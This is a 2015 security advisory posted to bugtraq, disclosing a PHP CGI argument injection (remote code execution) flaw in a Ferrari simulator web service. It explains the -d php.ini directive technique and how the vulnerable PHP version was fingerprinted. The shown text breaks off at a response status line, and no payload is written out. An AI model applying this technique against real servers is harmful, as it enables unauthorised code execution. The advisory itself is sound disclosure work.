Date: Fri, 7 Aug 2015 19:23:38 +0200
From: Vulnerability Lab <research@...nerability-lab.com>
To: bugtraq@...urityfocus.com, bugs@...uritytracker.com
Subject: Ferrari - PHP CGI Argument Injection (RCE) Vulnerability

Document Title:
===============
Ferrari - PHP CGI Argument Injection (RCE) Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1562

Video: http://www.vulnerability-lab.com/get_content.php?id=1561

Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/08/07/ferraricom-simulationcenter-remote-code-execution-php-cgi-argument-injection

Release Date:
=============
2015-08-07

Vulnerability Laboratory ID (VL-ID):
====================================
1562

Common Vulnerability Scoring System:
====================================
9.2

Product & Service Introduction:
===============================
Users can choose from one in five different circuits (Monza, Imola, Mugello, Silverstone and Nürburgring), while HD screens literally wrap
180 degrees around them, delivering ultra-realistic graphics to boot. The experience perfectly illustrates the concept of the new Ferrari Store,
which was opened just two months ago and was conceived not merely as a shopping destination but also as an entertainment venue.
With four F1 simulators, interactive video walls and numerous multisensory positions, the new 750 square meter space treats visitors to a
completely immersive experience of the Ferrari legend.

(Copy of the Vendor Homepage http://auto.ferrari.com/en_EN/news-events/ )

Abstract Advisory Information:
==============================
An indepndent vulnerability laboratory researcher discovered a remote code execution vulnerability in the official ferrari online service web-application.

Vulnerability Disclosure Timeline:
==================================
2015-08-07:	Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Ferrari
Product: Simulator - Online Service (Web-Application) 2015 Q3

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Critical

Technical Details & Description:
================================
When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of
the -d flag to set php.ini directives to achieve code execution. From the advisory: ``if there is NO unescaped `=` in the query string, the string is
split on `+` (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the ``encoded in a system-defined
manner`` from the RFC) and then passes them to the CGI binary.`` This module can also be used to exploit the plesk 0day disclosed by kingcope and
exploited in the wild on June 2013. (Source: http://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection)

Proof of Concept (PoC):
The remote code execution vulnerability can be exploited by remote attackers without privilege application user account or user interaction.
For security demonstration or to reproduce follow the provided information and steps below to continue.

How I found the vulnerability: As part of any penetration test, fingerprinting is one of the first steps.
After sending a request to their servers, I noticed they used PHP/5.3.12 which is known to be vulnerable to a Command execution vulnerability.

The Response:
HTTP/1.1 302 Found